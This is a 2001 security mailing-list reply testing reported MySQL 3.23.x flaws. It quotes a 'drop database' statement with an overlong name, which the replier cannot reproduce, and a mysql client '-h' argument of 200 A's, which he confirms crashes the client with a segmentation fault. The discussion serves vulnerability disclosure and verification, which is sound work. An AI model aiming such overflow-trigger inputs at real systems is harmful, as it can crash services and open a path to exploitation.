Re: Some more MySql security issues

[Theodor Milkov <zimage () DELBG COM>]

On Sat, Feb 10, 2001 at 12:54:33AM -0000, Joao Gouveia wrote:
> Hi,
>
> MySql staff has been notified regarding this issues on 2001-01-26.
>
> There still are some potential security flaws with MySql lastest stable
> release.
> Follows some tests i've made all with:
>
> MySql v3.23.32
> PHP v4.0.4pl1 (static)
> apache-1.3.14

And my results on:

1. MySQL v3.23.31
   Slackware-7.1 (glibc-2.1.3)

2. MySQL v3.23.31
   Slackware-3.4 (libc5 + gcc-2.95.2)

> Problem 1.
<cut>
> mysql> drop database
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
> </quote>
<cut>

It seems I'm unable to reproduce this either on 3.4 and 7.1:

mysql> drop database
    -> [2048 A's];
ERROR 1102: Incorrect database name 
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

> Problem 2.
> -----------
> MySql client that ships with the MySql package has a buffer overflow
> situation on the "host" user suplied input. ( among other paramaters, but
> this one can be critical )
<cut>
> /home/jroberto/httpd/mysql/bin/mysql -h`perl -e'printf("A"x200)'`
>
> Program received signal SIGSEGV, Segmentation fault.
<cut>

mysql -h`perl -e'printf("A"x200)'`
Segmentation fault

This one works on 3.4 as well on 7.1.

-- 
        =- --rw------- =--=--=--=--=--=--=--=--=--=--=--=--=--=
          Theodor Milkov           Administrator IP Networks
          Davidov Electric Ltd.    Phone: +359 (2) 730158
          PGP: http://www.zimage.delbg.com/zimage.asc
        =--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=

Attachment: _bin
Description: